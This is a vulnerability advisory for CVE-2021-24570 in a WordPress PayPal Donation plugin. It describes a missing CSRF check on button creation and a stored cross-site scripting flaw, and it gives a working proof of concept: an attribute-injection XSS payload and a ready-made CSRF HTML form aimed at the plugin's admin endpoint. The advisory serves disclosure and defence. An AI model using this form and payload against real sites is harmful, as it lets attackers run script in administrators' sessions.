Paypal Donation < 1.3.1 – CSRF to Stored Cross-Site Scripting | CVE 2021-24570

Description

The plugin offers a function to create donation buttons, which internally are posts. The process to create a new button is lacking a CSRF check. An attacker could use this to make an authenticated admin create a new button. Furthermore, one of the Button field is not escaped before being output in an attribute when editing a Button, leading to a Stored Cross-Site Scripting issue as well.

Proof of Concept

Create/Edit a Button and put the following payload in the Amount Menu Name field (wpedon_button_scpriceprice parameter): " autofocus=autofocus onfocus=alert(/XSS/) e=

Via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpedon_buttons&action=new" method="POST">
      <input type="hidden" name="wpedon_button_name" value="Test" />
      <input type="hidden" name="wpedon_button_price" value="" />
      <input type="hidden" name="wpedon_button_scpriceprice" value='" autofocus=autofocus onfocus=alert(/XSS/) e=' />
      <input type="hidden" name="update" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The name, price and id params are not required. But they are displayed on the buttons overview and can be used to attract the victims attention to edit the Button. 

The XSS will trigger when editing the affected Button